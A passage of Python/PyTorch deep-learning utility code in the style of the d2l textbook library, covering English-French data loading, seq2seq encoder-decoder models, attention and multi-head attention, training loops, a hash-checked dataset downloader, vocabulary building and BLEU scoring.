        # Redraw every curve from scratch and replace the displayed figure.
        self.axes[0].cla()
        for x, y, fmt in zip(self.X, self.Y, self.fmts):
            self.axes[0].plot(x, y, fmt)
        self.config_axes()
        display.display(self.fig)
        display.clear_output(wait=True)
def sequence_mask(X, valid_len, value=0):
    """Overwrite entries of `X` past each row's valid length (in place).

    Args:
        X: (batch, maxlen, ...) tensor; modified in place and returned.
        valid_len: (batch,) tensor of valid lengths per row.
        value: fill value for the masked-out positions.
    """
    positions = torch.arange(X.size(1), dtype=torch.float32, device=X.device)
    # True where the position index is at or past the row's valid length.
    invalid = positions.unsqueeze(0) >= valid_len.unsqueeze(1)
    X[invalid] = value
    return X
def read_data_nmt():
    """Load the raw English-French dataset as one string.

    FIX: the file is read with an explicit UTF-8 encoding — the original
    used the platform default, which fails on the accented French text
    under e.g. cp1252 locales.
    """
    data_dir = download_extract('fra-eng')
    with open(os.path.join(data_dir, 'fra.txt'), 'r', encoding='utf-8') as f:
        return f.read()
def preprocess_nmt(text):
    """Normalize the raw English-French text.

    Replaces non-breaking spaces with plain spaces, lowercases everything,
    and inserts a space before `, . ! ?` when one is not already present,
    so punctuation becomes its own token.
    """
    text = text.replace('\u202f', ' ').replace('\xa0', ' ').lower()
    pieces = []
    for i, ch in enumerate(text):
        if i > 0 and ch in ',.!?' and text[i - 1] != ' ':
            pieces.append(' ')
        pieces.append(ch)
    return ''.join(pieces)
def tokenize_nmt(text, num_examples=None):
    """Split each tab-separated line into (source, target) word lists.

    Lines without exactly one tab are skipped. NOTE: keeps the original
    early-exit condition (`i > num_examples`), which admits one extra line.
    """
    source, target = [], []
    for i, line in enumerate(text.split('\n')):
        if num_examples and i > num_examples:
            break
        parts = line.split('\t')
        if len(parts) == 2:
            src, tgt = parts
            source.append(src.split(' '))
            target.append(tgt.split(' '))
    return source, target
def truncate_pad(line, num_steps, padding_token):
    """Clip `line` to `num_steps` tokens or right-pad it with `padding_token`."""
    clipped = line[:num_steps]
    return clipped + [padding_token] * (num_steps - len(clipped))
def build_array_nmt(lines, vocab, num_steps):
    """Map token lines to a padded index tensor plus per-line valid lengths.

    Each line is indexed through `vocab`, terminated with `<eos>`, and
    truncated/padded to `num_steps` with `<pad>`. The valid length counts
    the non-pad entries of each row.
    """
    indexed = [vocab[tokens] + [vocab['<eos>']] for tokens in lines]
    array = torch.tensor(
        [truncate_pad(seq, num_steps, vocab['<pad>']) for seq in indexed])
    valid_len = (array != vocab['<pad>']).type(torch.int32).sum(1)
    return array, valid_len
def load_data_nmt(batch_size, num_steps, num_examples=600):
    """Return the iterator and the vocabularies of the translation dataset.

    Downloads/preprocesses the English-French corpus, builds source and
    target vocabularies (min frequency 2, with pad/bos/eos reserved),
    converts both sides to padded index arrays and wraps them in a
    shuffled DataLoader yielding (src, src_len, tgt, tgt_len) batches.
    """
    text = preprocess_nmt(read_data_nmt())
    source, target = tokenize_nmt(text, num_examples)
    src_vocab = Vocab(source, min_freq=2,
                      reserved_tokens=['<pad>', '<bos>', '<eos>'])
    tgt_vocab = Vocab(target, min_freq=2, reserved_tokens=['<pad>', '<bos>', '<eos>'])
    src_array, src_valid_len = build_array_nmt(source, src_vocab, num_steps)
    tgt_array, tgt_valid_len = build_array_nmt(target, tgt_vocab, num_steps)
    data_arrays = (src_array, src_valid_len, tgt_array, tgt_valid_len)
    data_iter = load_array(data_arrays, batch_size)
    return data_iter, src_vocab, tgt_vocab
class Encoder(nn.Module):
    """The base encoder interface for the encoder-decoder architecture."""
    def __init__(self, **kwargs):
        super(Encoder, self).__init__(**kwargs)

    def forward(self, X, *args):
        # Subclasses must map the input sequence `X` to encoder outputs.
        raise NotImplementedError
class Decoder(nn.Module):
    """The base decoder interface for the encoder-decoder architecture."""
    def __init__(self, **kwargs):
        super(Decoder, self).__init__(**kwargs)

    def init_state(self, enc_outputs, *args):
        # Subclasses derive the initial decoder state from encoder outputs.
        raise NotImplementedError

    def forward(self, X, state):
        # Subclasses consume the target-side input `X` and the state.
        raise NotImplementedError
class EncoderDecoder(nn.Module):
    """Compose an encoder and a decoder into a single seq2seq model."""

    def __init__(self, encoder, decoder, **kwargs):
        super(EncoderDecoder, self).__init__(**kwargs)
        self.encoder = encoder
        self.decoder = decoder

    def forward(self, enc_X, dec_X, *args):
        # Encode the source, seed the decoder state from the encoder
        # outputs, then run the decoder over the target-side input.
        state = self.decoder.init_state(self.encoder(enc_X, *args), *args)
        return self.decoder(dec_X, state)
class Seq2SeqEncoder(Encoder):
    """GRU encoder for sequence-to-sequence learning."""

    def __init__(self, vocab_size, embed_size, num_hiddens, num_layers,
                 dropout=0, **kwargs):
        super(Seq2SeqEncoder, self).__init__(**kwargs)
        # Token ids -> dense vectors, then a (possibly stacked) GRU.
        self.embedding = nn.Embedding(vocab_size, embed_size)
        self.rnn = nn.GRU(embed_size, num_hiddens, num_layers,
                          dropout=dropout)

    def forward(self, X, *args):
        # (batch, steps) ids -> (batch, steps, embed), then move the time
        # axis first because torch RNNs expect (steps, batch, embed).
        embedded = self.embedding(X).permute(1, 0, 2)
        # Initial hidden state defaults to zeros when omitted.
        output, state = self.rnn(embedded)
        # output: (steps, batch, hiddens); state: (layers, batch, hiddens)
        return output, state
def masked_softmax(X, valid_lens):
    """Perform softmax operation by masking elements on the last axis.

    Args:
        X: 3D tensor of scores, shape (batch, queries, keys).
        valid_lens: 1D tensor (batch,) or 2D tensor (batch, queries) of
            valid key counts; None means no masking.
    """
    # `X`: 3D tensor, `valid_lens`: 1D or 2D tensor
    if valid_lens is None:
        return nn.functional.softmax(X, dim=-1)
    else:
        shape = X.shape
        if valid_lens.dim() == 1:
            # One length per batch row: repeat it for every query.
            valid_lens = torch.repeat_interleave(valid_lens, shape[1])
        else:
            valid_lens = valid_lens.reshape(-1)
        # On the last axis, replace masked elements with a very large negative
        # value, whose exponentiation outputs 0
        X = sequence_mask(X.reshape(-1, shape[-1]), valid_lens,
                          value=-1e6)
        return nn.functional.softmax(X.reshape(shape), dim=-1)
class AdditiveAttention(nn.Module):
    """Additive (Bahdanau-style) attention scoring function.

    Scores are w_v . tanh(W_q q + W_k k), so queries and keys may have
    different dimensionalities.
    """
    def __init__(self, key_size, query_size, num_hiddens, dropout, **kwargs):
        super(AdditiveAttention, self).__init__(**kwargs)
        self.W_k = nn.Linear(key_size, num_hiddens, bias=False)
        self.W_q = nn.Linear(query_size, num_hiddens, bias=False)
        self.w_v = nn.Linear(num_hiddens, 1, bias=False)
        self.dropout = nn.Dropout(dropout)

    def forward(self, queries, keys, values, valid_lens):
        queries, keys = self.W_q(queries), self.W_k(keys)
        # After dimension expansion, shape of `queries`: (`batch_size`, no. of
        # queries, 1, `num_hiddens`) and shape of `keys`: (`batch_size`, 1,
        # no. of key-value pairs, `num_hiddens`). Sum them up with
        # broadcasting
        features = queries.unsqueeze(2) + keys.unsqueeze(1)
        features = torch.tanh(features)
        # There is only one output of `self.w_v`, so we remove the last
        # one-dimensional entry from the shape. Shape of `scores`:
        # (`batch_size`, no. of queries, no. of key-value pairs)
        scores = self.w_v(features).squeeze(-1)
        # Kept on the instance for later visualization.
        self.attention_weights = masked_softmax(scores, valid_lens)
        # Shape of `values`: (`batch_size`, no. of key-value pairs, value
        # dimension)
        return torch.bmm(self.dropout(self.attention_weights), values)
# NOTE(review): the four functions below re-define use_svg_display,
# set_figsize, set_axes and plot, which already appear earlier in this
# file with identical bodies. Python keeps the last definition, so this is
# harmless but redundant — consider deleting one copy.
def use_svg_display():
    """Use the svg format to display a plot in Jupyter."""
    display.set_matplotlib_formats('svg')
def set_figsize(figsize=(3.5, 2.5)):
    """Set the figure size for matplotlib."""
    use_svg_display()
    plt.rcParams['figure.figsize'] = figsize
def set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):
    """Set the axes for matplotlib."""
    axes.set_xlabel(xlabel)
    axes.set_ylabel(ylabel)
    axes.set_xscale(xscale)
    axes.set_yscale(yscale)
    axes.set_xlim(xlim)
    axes.set_ylim(ylim)
    if legend:
        axes.legend(legend)
    axes.grid()
def plot(X, Y=None, xlabel=None, ylabel=None, legend=None, xlim=None,
         ylim=None, xscale='linear', yscale='linear',
         fmts=('-', 'm--', 'g-.', 'r:'), figsize=(3.5, 2.5), axes=None):
    """Plot data points."""
    if legend is None:
        legend = []
    set_figsize(figsize)
    axes = axes if axes else plt.gca()
    # Return True if `X` (tensor or list) has 1 axis
    def has_one_axis(X):
        return (hasattr(X, "ndim") and X.ndim == 1 or
                isinstance(X, list) and not hasattr(X[0], "__len__"))
    if has_one_axis(X):
        X = [X]
    if Y is None:
        X, Y = [[]] * len(X), X
    elif has_one_axis(Y):
        Y = [Y]
    if len(X) != len(Y):
        X = X * len(Y)
    axes.cla()
    for x, y, fmt in zip(X, Y, fmts):
        if len(x):
            axes.plot(x, y, fmt)
        else:
            axes.plot(y, fmt)
    set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend)
def load_array(data_arrays, batch_size, is_train=True):
    """Wrap same-length tensors in a DataLoader; shuffle only when training."""
    dataset = data.TensorDataset(*data_arrays)
    return data.DataLoader(dataset, batch_size, shuffle=is_train)
class Accumulator:
    """Accumulate running sums over `n` variables."""

    def __init__(self, n):
        self.data = [0.0] * n

    def add(self, *args):
        # Pairwise add each increment onto the corresponding slot.
        self.data = [total + float(inc) for total, inc in zip(self.data, args)]

    def reset(self):
        self.data = [0.0] * len(self.data)

    def __getitem__(self, idx):
        return self.data[idx]
def evaluate_loss(net, data_iter, loss):
    """Average of `loss` for `net` over every example in `data_iter`."""
    metric = Accumulator(2)  # (summed loss, example count)
    for X, y in data_iter:
        y_hat = net(X)
        batch_loss = loss(y_hat, torch.reshape(y, y_hat.shape))
        metric.add(torch.sum(batch_loss), batch_loss.numel())
    return metric[0] / metric[1]
class Timer:
    """Record multiple running times."""

    def __init__(self):
        self.times = []
        self.start()

    def start(self):
        """Begin timing an interval."""
        self.tik = time.time()

    def stop(self):
        """End the current interval, record its duration, and return it."""
        elapsed = time.time() - self.tik
        self.times.append(elapsed)
        return elapsed

    def avg(self):
        """Mean of all recorded intervals."""
        return sum(self.times) / len(self.times)

    def sum(self):
        """Total of all recorded intervals."""
        return sum(self.times)

    def cumsum(self):
        """Running cumulative totals of the recorded intervals."""
        return np.array(self.times).cumsum().tolist()
# NOTE(review): duplicate of the truncate_pad defined earlier in this file.
def truncate_pad(line, num_steps, padding_token):
    """Truncate or pad sequences to exactly `num_steps` tokens."""
    if len(line) > num_steps:
        return line[:num_steps]  # Truncate
    return line + [padding_token] * (num_steps - len(line))  # Pad
def train_seq2seq(net, data_iter, lr, num_epochs, tgt_vocab, device):
    """Train a model for sequence to sequence.

    Xavier-initializes Linear/GRU weights, optimizes with Adam against the
    masked softmax CE loss, uses teacher forcing (decoder input is <bos>
    followed by the shifted target), clips the global gradient norm to 1,
    and plots the per-token loss every 10 epochs.
    """
    def xavier_init_weights(m):
        if type(m) == nn.Linear:
            nn.init.xavier_uniform_(m.weight)
        if type(m) == nn.GRU:
            for param in m._flat_weights_names:
                if "weight" in param:
                    nn.init.xavier_uniform_(m._parameters[param])
    net.apply(xavier_init_weights)
    net.to(device)
    optimizer = torch.optim.Adam(net.parameters(), lr=lr)
    loss = MaskedSoftmaxCELoss()
    net.train()
    animator = Animator(xlabel='epoch', ylabel='loss',
                        xlim=[10, num_epochs])
    for epoch in range(num_epochs):
        timer = Timer()
        metric = Accumulator(2)  # Sum of training loss, no. of tokens
        for batch in data_iter:
            optimizer.zero_grad()
            X, X_valid_len, Y, Y_valid_len = [x.to(device) for x in batch]
            bos = torch.tensor([tgt_vocab['<bos>']] * Y.shape[0],
                               device=device).reshape(-1, 1)
            dec_input = torch.cat([bos, Y[:, :-1]], 1)  # Teacher forcing
            Y_hat, _ = net(X, dec_input, X_valid_len)
            l = loss(Y_hat, Y, Y_valid_len)
            l.sum().backward()  # Make the loss scalar for `backward`
            grad_clipping(net, 1)
            num_tokens = Y_valid_len.sum()
            optimizer.step()
            with torch.no_grad():
                metric.add(l.sum(), num_tokens)
        if (epoch + 1) % 10 == 0:
            animator.add(epoch + 1, (metric[0] / metric[1],))
    # NOTE(review): the two f-strings concatenate without a space, so the
    # output reads "...123.4tokens/sec".
    print(f'loss {metric[0] / metric[1]:.3f}, {metric[1] / timer.stop():.1f}' f'tokens/sec on {str(device)}')
def predict_seq2seq(net, src_sentence, src_vocab, tgt_vocab, num_steps,
                    device, save_attention_weights=False):
    """Greedy decoding for sequence to sequence.

    Encodes `src_sentence` (lowercased, space-tokenized, <eos>-terminated,
    padded to `num_steps`), then feeds the decoder its own argmax output
    step by step until <eos> or `num_steps` tokens. Returns the decoded
    string and (optionally collected) per-step attention weights.
    """
    # Set `net` to eval mode for inference
    net.eval()
    src_tokens = src_vocab[src_sentence.lower().split(' ')] + [
        src_vocab['<eos>']]
    enc_valid_len = torch.tensor([len(src_tokens)], device=device)
    src_tokens = truncate_pad(src_tokens, num_steps, src_vocab['<pad>'])
    # Add the batch axis
    enc_X = torch.unsqueeze(
        torch.tensor(src_tokens, dtype=torch.long, device=device), dim=0)
    enc_outputs = net.encoder(enc_X, enc_valid_len)
    dec_state = net.decoder.init_state(enc_outputs, enc_valid_len)
    # Add the batch axis
    dec_X = torch.unsqueeze(
        torch.tensor([tgt_vocab['<bos>']], dtype=torch.long, device=device),
        dim=0)
    output_seq, attention_weight_seq = [], []
    for _ in range(num_steps):
        Y, dec_state = net.decoder(dec_X, dec_state)
        # We use the token with the highest prediction likelihood as the input
        # of the decoder at the next time step
        dec_X = Y.argmax(dim=2)
        pred = dec_X.squeeze(dim=0).type(torch.int32).item()
        # Save attention weights (to be covered later)
        if save_attention_weights:
            attention_weight_seq.append(net.decoder.attention_weights)
        # Once the end-of-sequence token is predicted, the generation of the
        # output sequence is complete
        if pred == tgt_vocab['<eos>']:
            break
        output_seq.append(pred)
    return ' '.join(tgt_vocab.to_tokens(output_seq)), attention_weight_seq
class DotProductAttention(nn.Module):
    """Scaled dot product attention: softmax(QK^T / sqrt(d)) V."""

    def __init__(self, dropout, **kwargs):
        super(DotProductAttention, self).__init__(**kwargs)
        self.dropout = nn.Dropout(dropout)

    def forward(self, queries, keys, values, valid_lens=None):
        """queries: (B, Q, d); keys: (B, K, d); values: (B, K, v);
        valid_lens: (B,), (B, Q) or None."""
        scale = math.sqrt(queries.shape[-1])
        # (B, Q, K) similarity scores; transpose swaps keys' last two dims.
        scores = torch.bmm(queries, keys.transpose(1, 2)) / scale
        # Kept on the instance for later visualization.
        self.attention_weights = masked_softmax(scores, valid_lens)
        return torch.bmm(self.dropout(self.attention_weights), values)
class MultiHeadAttention(nn.Module):
    """Multi-head attention: project Q/K/V, run scaled dot-product
    attention per head in one batched call, and recombine the heads.

    `num_hiddens` must be divisible by `num_heads` for the head reshape
    in `transpose_qkv` to be exact.
    """
    def __init__(self, key_size, query_size, value_size, num_hiddens,
                 num_heads, dropout, bias=False, **kwargs):
        super(MultiHeadAttention, self).__init__(**kwargs)
        self.num_heads = num_heads
        self.attention = DotProductAttention(dropout)
        self.W_q = nn.Linear(query_size, num_hiddens, bias=bias)
        self.W_k = nn.Linear(key_size, num_hiddens, bias=bias)
        self.W_v = nn.Linear(value_size, num_hiddens, bias=bias)
        self.W_o = nn.Linear(num_hiddens, num_hiddens, bias=bias)

    def forward(self, queries, keys, values, valid_lens):
        # Shape of `queries`, `keys`, or `values`:
        # (`batch_size`, no. of queries or key-value pairs, `num_hiddens`)
        # Shape of `valid_lens`:
        # (`batch_size`,) or (`batch_size`, no. of queries)
        # After transposing, shape of output `queries`, `keys`, or `values`:
        # (`batch_size` * `num_heads`, no. of queries or key-value pairs,
        # `num_hiddens` / `num_heads`)
        queries = transpose_qkv(self.W_q(queries), self.num_heads)
        keys = transpose_qkv(self.W_k(keys), self.num_heads)
        values = transpose_qkv(self.W_v(values), self.num_heads)
        if valid_lens is not None:
            # On axis 0, copy the first item (scalar or vector) for
            # `num_heads` times, then copy the next item, and so on
            valid_lens = torch.repeat_interleave(valid_lens, repeats=self.num_heads, dim=0)
        # Shape of `output`: (`batch_size` * `num_heads`, no. of queries,
        # `num_hiddens` / `num_heads`)
        output = self.attention(queries, keys, values, valid_lens)
        # Shape of `output_concat`:
        # (`batch_size`, no. of queries, `num_hiddens`)
        output_concat = transpose_output(output, self.num_heads)
        return self.W_o(output_concat)
def transpose_qkv(X, num_heads):
    """Split the hidden axis into heads for parallel attention.

    (batch, length, hiddens) -> (batch * num_heads, length,
    hiddens / num_heads), so one bmm can attend all heads at once.
    """
    batch, length = X.shape[0], X.shape[1]
    # Expose the head axis, then move it next to the batch axis.
    X = X.reshape(batch, length, num_heads, -1).permute(0, 2, 1, 3)
    # Fold the head axis into the batch axis.
    return X.reshape(batch * num_heads, length, -1)
def transpose_output(X, num_heads):
    """Invert `transpose_qkv`: (batch * num_heads, length, head_dim)
    -> (batch, length, num_heads * head_dim)."""
    X = X.reshape(-1, num_heads, X.shape[1], X.shape[2]).permute(0, 2, 1, 3)
    return X.reshape(X.shape[0], X.shape[1], -1)
class PositionalEncoding(nn.Module):
    """Add sinusoidal position information to embeddings, then dropout.

    P[0, pos, 2i]   = sin(pos / 10000^(2i / num_hiddens))
    P[0, pos, 2i+1] = cos(pos / 10000^(2i / num_hiddens))
    """

    def __init__(self, num_hiddens, dropout, max_len=1000):
        super(PositionalEncoding, self).__init__()
        self.dropout = nn.Dropout(dropout)
        # Precompute a long-enough table once.
        self.P = torch.zeros((1, max_len, num_hiddens))
        positions = torch.arange(max_len, dtype=torch.float32).reshape(-1, 1)
        divisors = torch.pow(10000, torch.arange(
            0, num_hiddens, 2, dtype=torch.float32) / num_hiddens)
        angles = positions / divisors
        self.P[:, :, 0::2] = torch.sin(angles)
        self.P[:, :, 1::2] = torch.cos(angles)

    def forward(self, X):
        # Add the first seq_len rows of the table, broadcast over batch.
        X = X + self.P[:, :X.shape[1], :].to(X.device)
        return self.dropout(X)
class AttentionDecoder(Decoder):
    """The base attention-based decoder interface.

    Concrete subclasses expose their most recent attention maps through
    the `attention_weights` property.
    """
    def __init__(self, **kwargs):
        super(AttentionDecoder, self).__init__(**kwargs)

    @property
    def attention_weights(self):
        # Must be implemented by concrete attention decoders.
        raise NotImplementedError
class MaskedSoftmaxCELoss(nn.CrossEntropyLoss):
    """The softmax cross-entropy loss with padding positions masked out."""
    # `pred` shape: (`batch_size`, `num_steps`, `vocab_size`)
    # `label` shape: (`batch_size`, `num_steps`)
    # `valid_len` shape: (`batch_size`,)
    def forward(self, pred, label, valid_len):
        # Weight 1 for valid positions, 0 for positions past valid_len.
        weights = torch.ones_like(label)
        weights = sequence_mask(weights, valid_len)
        # Keep per-position losses so we can weight them ourselves.
        self.reduction = 'none'
        unweighted_loss = super(MaskedSoftmaxCELoss, self).forward(
            pred.permute(0, 2, 1), label)
        # Mean over time steps (padding contributes 0) -> one loss per row.
        weighted_loss = (unweighted_loss * weights).mean(dim=1)
        return weighted_loss
def grad_clipping(net, theta):
    """Rescale gradients in place so their global L2 norm is at most theta.

    Accepts either an nn.Module (uses trainable `parameters()`) or an
    object exposing a `params` list.
    """
    if isinstance(net, nn.Module):
        params = [p for p in net.parameters() if p.requires_grad]
    else:
        params = net.params
    total_norm = torch.sqrt(sum(torch.sum(p.grad ** 2) for p in params))
    if total_norm > theta:
        scale = theta / total_norm
        for p in params:
            p.grad[:] *= scale
# NOTE(review): duplicate of the train_seq2seq defined earlier in this
# file (identical body); Python keeps this later definition.
def train_seq2seq(net, data_iter, lr, num_epochs, tgt_vocab, device):
    """Train a model for sequence to sequence (teacher forcing + Adam +
    masked CE loss + gradient clipping to norm 1)."""
    def xavier_init_weights(m):
        if type(m) == nn.Linear:
            nn.init.xavier_uniform_(m.weight)
        if type(m) == nn.GRU:
            for param in m._flat_weights_names:
                if "weight" in param:
                    nn.init.xavier_uniform_(m._parameters[param])
    net.apply(xavier_init_weights)
    net.to(device)
    optimizer = torch.optim.Adam(net.parameters(), lr=lr)
    loss = MaskedSoftmaxCELoss()
    net.train()
    animator = Animator(xlabel='epoch', ylabel='loss',
                        xlim=[10, num_epochs])
    for epoch in range(num_epochs):
        timer = Timer()
        metric = Accumulator(2)  # Sum of training loss, no. of tokens
        for batch in data_iter:
            optimizer.zero_grad()
            X, X_valid_len, Y, Y_valid_len = [x.to(device) for x in batch]
            bos = torch.tensor([tgt_vocab['<bos>']] * Y.shape[0],
                               device=device).reshape(-1, 1)
            dec_input = torch.cat([bos, Y[:, :-1]], 1)  # Teacher forcing
            Y_hat, _ = net(X, dec_input, X_valid_len)
            l = loss(Y_hat, Y, Y_valid_len)
            l.sum().backward()  # Make the loss scalar for `backward`
            grad_clipping(net, 1)
            num_tokens = Y_valid_len.sum()
            optimizer.step()
            with torch.no_grad():
                metric.add(l.sum(), num_tokens)
        if (epoch + 1) % 10 == 0:
            animator.add(epoch + 1, (metric[0] / metric[1],))
    print(f'loss {metric[0] / metric[1]:.3f}, {metric[1] / timer.stop():.1f}' f'tokens/sec on {str(device)}')
def try_gpu(i=0):
    """Return the i-th CUDA device when it exists, otherwise the CPU device."""
    if torch.cuda.device_count() < i + 1:
        return torch.device('cpu')
    return torch.device(f'cuda:{i}')
# Registry of downloadable datasets: name -> (url, expected SHA-1 digest).
DATA_HUB = dict()
DATA_URL = 'http://d2l-data.s3-accelerate.amazonaws.com/'
DATA_HUB['time_machine'] = (DATA_URL + 'timemachine.txt','090b5e7e70c295757f55df93cb0a180b9691891a')
DATA_HUB['fra-eng'] = (DATA_URL + 'fra-eng.zip','94646ad1522d915e7b0f9296181140edcf86a4f5')
DATA_HUB['airfoil'] = (DATA_URL + 'airfoil_self_noise.dat','76e5be1548fd8222e5074cf0faae75edff8cf93f')
def download(name, cache_dir=os.path.join('..', 'data')):
    """Download a DATA_HUB file into `cache_dir`; return the local filename.

    A cached copy is reused when its SHA-1 digest matches the registered
    hash; otherwise the file is (re-)downloaded.

    Raises:
        requests.HTTPError: when the server returns an error status. (The
            original wrote the error page to the cache, which then failed
            the hash check forever after.)
    """
    assert name in DATA_HUB, f"{name} does not exist in {DATA_HUB}."
    url, sha1_hash = DATA_HUB[name]
    os.makedirs(cache_dir, exist_ok=True)
    fname = os.path.join(cache_dir, url.split('/')[-1])
    if os.path.exists(fname):
        sha1 = hashlib.sha1()
        with open(fname, 'rb') as f:
            # Hash in 1 MiB chunks to bound memory use.
            while True:
                data = f.read(1048576)
                if not data:
                    break
                sha1.update(data)
        if sha1.hexdigest() == sha1_hash:
            return fname  # Hit cache
    print(f'Downloading {fname} from {url}...')
    r = requests.get(url, stream=True, verify=True)
    r.raise_for_status()
    with open(fname, 'wb') as f:
        # Stream to disk instead of holding the whole body in memory.
        for chunk in r.iter_content(chunk_size=1048576):
            f.write(chunk)
    return fname
def download_extract(name, folder=None):
    """Download and extract a zip/tar archive; return the data directory.

    FIX: the original referenced `tarfile` without importing it (NameError
    for any .tar/.gz archive) and never closed the archive handle.
    """
    import tarfile  # stdlib; absent from the top-level imports
    fname = download(name)
    base_dir = os.path.dirname(fname)
    data_dir, ext = os.path.splitext(fname)
    if ext == '.zip':
        with zipfile.ZipFile(fname, 'r') as fp:
            fp.extractall(base_dir)
    elif ext in ('.tar', '.gz'):
        with tarfile.open(fname, 'r') as fp:
            fp.extractall(base_dir)
    else:
        assert False, 'Only zip/tar files can be extracted.'
    return os.path.join(base_dir, folder) if folder else data_dir
class Vocab:
    """Vocabulary for text.

    Index 0 is always `<unk>`, followed by `reserved_tokens`, then the
    remaining tokens in decreasing frequency order (tokens rarer than
    `min_freq` are dropped). `vocab[token]` maps tokens (or nested lists
    of tokens) to indices; unknown tokens map to 0.
    """
    def __init__(self, tokens=None, min_freq=0, reserved_tokens=None):
        if tokens is None:
            tokens = []
        if reserved_tokens is None:
            reserved_tokens = []
        # Sort according to frequencies
        counter = count_corpus(tokens)
        self.token_freqs = sorted(counter.items(), key=lambda x: x[1],
                                  reverse=True)
        # The index for the unknown token is 0
        self.unk, uniq_tokens = 0, ['<unk>'] + reserved_tokens
        # Frequency-ordered tokens follow the reserved ones; duplicates of
        # reserved tokens are skipped.
        uniq_tokens += [token for token, freq in self.token_freqs
                        if freq >= min_freq and token not in uniq_tokens]
        self.idx_to_token, self.token_to_idx = [], dict()
        for token in uniq_tokens:
            self.idx_to_token.append(token)
            self.token_to_idx[token] = len(self.idx_to_token) - 1

    def __len__(self):
        return len(self.idx_to_token)

    def __getitem__(self, tokens):
        # A single token -> its index (unk for unknown); a list/tuple ->
        # a list of indices, recursively.
        if not isinstance(tokens, (list, tuple)):
            return self.token_to_idx.get(tokens, self.unk)
        return [self.__getitem__(token) for token in tokens]

    def to_tokens(self, indices):
        # Inverse mapping: index (or list of indices) -> token(s).
        if not isinstance(indices, (list, tuple)):
            return self.idx_to_token[indices]
        return [self.idx_to_token[index] for index in indices]
def count_corpus(tokens):
    """Count token frequencies; accepts a flat token list or a list of lines."""
    if len(tokens) == 0 or isinstance(tokens[0], list):
        # Flatten a 2D token list before counting.
        tokens = [tok for line in tokens for tok in line]
    return collections.Counter(tokens)
def load_corpus_time_machine(max_tokens=-1):
    """Return token indices and the vocabulary of the time machine dataset.

    Character-level tokenization; `max_tokens > 0` truncates the corpus.
    """
    lines = read_time_machine()
    tokens = tokenize(lines, 'char')
    vocab = Vocab(tokens)
    # Since each text line in the time machine dataset is not necessarily a
    # sentence or a paragraph, flatten all the text lines into a single list
    corpus = [vocab[token] for line in tokens for token in line]
    if max_tokens > 0:
        corpus = corpus[:max_tokens]
    return corpus, vocab
def tokenize(lines, token='word'):
    """Split text lines into word or character tokens.

    Args:
        lines: list of strings.
        token: 'word' (split on whitespace) or 'char' (individual chars).

    Raises:
        ValueError: for an unknown `token` type. (The original printed an
            error and implicitly returned None, which surfaced later as a
            confusing TypeError at the call site.)
    """
    if token == 'word':
        return [line.split() for line in lines]
    if token == 'char':
        return [list(line) for line in lines]
    raise ValueError(f'unknown token type: {token!r}')
def read_time_machine():
    """Load the time machine dataset as lowercased, letters-only lines.

    FIX: reads with an explicit UTF-8 encoding — the original relied on
    the platform default, which can fail on non-ASCII bytes.
    """
    with open(download('time_machine'), 'r', encoding='utf-8') as f:
        lines = f.readlines()
    # Collapse every non-letter run to a single space, then normalize case.
    return [re.sub('[^A-Za-z]+', ' ', line).strip().lower() for line in lines]
def seq_data_iter_random(corpus, batch_size, num_steps):  #@save
    """Yield (X, Y) minibatches of subsequences via random sampling.

    Y is X shifted one token ahead. Subsequence start positions are
    shuffled, so adjacent minibatches are generally not adjacent in the
    original sequence.
    """
    # Random initial offset so different epochs see different partitions.
    corpus = corpus[random.randint(0, num_steps - 1):]
    # Reserve one trailing token because labels are inputs shifted by one.
    num_subseqs = (len(corpus) - 1) // num_steps
    starts = list(range(0, num_subseqs * num_steps, num_steps))
    random.shuffle(starts)
    num_batches = num_subseqs // batch_size
    for batch_idx in range(num_batches):
        chosen = starts[batch_idx * batch_size:(batch_idx + 1) * batch_size]
        X = [corpus[s:s + num_steps] for s in chosen]
        Y = [corpus[s + 1:s + 1 + num_steps] for s in chosen]
        yield torch.tensor(X), torch.tensor(Y)
def seq_data_iter_sequential(corpus, batch_size, num_steps):
    """Yield (X, Y) minibatches using sequential partitioning.

    Each batch row continues where the same row of the previous batch
    ended; Y is X shifted one token ahead.
    """
    # Random starting offset to vary the partition between epochs.
    offset = random.randint(0, num_steps)
    num_tokens = ((len(corpus) - offset - 1) // batch_size) * batch_size
    Xs = torch.tensor(corpus[offset:offset + num_tokens]).reshape(batch_size, -1)
    Ys = torch.tensor(corpus[offset + 1:offset + 1 + num_tokens]).reshape(batch_size, -1)
    num_batches = Xs.shape[1] // num_steps
    for start in range(0, num_batches * num_steps, num_steps):
        yield Xs[:, start:start + num_steps], Ys[:, start:start + num_steps]
class SeqDataLoader:  #@save
    """An iterator that yields minibatches from the time machine corpus."""

    def __init__(self, batch_size, num_steps, use_random_iter, max_tokens):
        # The two sampling strategies differ only in the iterator function.
        self.data_iter_fn = (seq_data_iter_random if use_random_iter
                             else seq_data_iter_sequential)
        self.corpus, self.vocab = load_corpus_time_machine(max_tokens)
        self.batch_size, self.num_steps = batch_size, num_steps

    def __iter__(self):
        return self.data_iter_fn(self.corpus, self.batch_size, self.num_steps)
def load_data_time_machine(batch_size, num_steps, use_random_iter=False, max_tokens=10000):
    """Return the iterator and the vocabulary of the time machine dataset.

    Thin wrapper around SeqDataLoader (character-level corpus).
    """
    data_iter = SeqDataLoader( batch_size, num_steps, use_random_iter, max_tokens)
    return data_iter, data_iter.vocab
def bleu(pred_seq, label_seq, k):
    """Compute BLEU for a space-tokenized prediction against a reference.

    score = BP * prod_n (p_n)^(1/2^n) for n = 1..k, where p_n is the
    clipped n-gram precision and BP the brevity penalty.

    FIXES vs. the original:
    - returns 0.0 when some n-gram order exceeds the prediction length
      (the original raised ZeroDivisionError for k > len(pred));
    - n-grams are keyed with a space separator: ``''.join`` conflated
      distinct token sequences such as ('ab','c') and ('a','bc').
    """
    pred_tokens, label_tokens = pred_seq.split(' '), label_seq.split(' ')
    len_pred, len_label = len(pred_tokens), len(label_tokens)
    score = math.exp(min(0, 1 - len_label / len_pred))
    for n in range(1, k + 1):
        if len_pred - n + 1 <= 0:
            return 0.0  # no n-grams of this order in the prediction
        num_matches, label_subs = 0, collections.defaultdict(int)
        for i in range(len_label - n + 1):
            label_subs[' '.join(label_tokens[i:i + n])] += 1
        # Clipped matching: each reference n-gram can be consumed once.
        for i in range(len_pred - n + 1):
            ngram = ' '.join(pred_tokens[i:i + n])
            if label_subs[ngram] > 0:
                num_matches += 1
                label_subs[ngram] -= 1
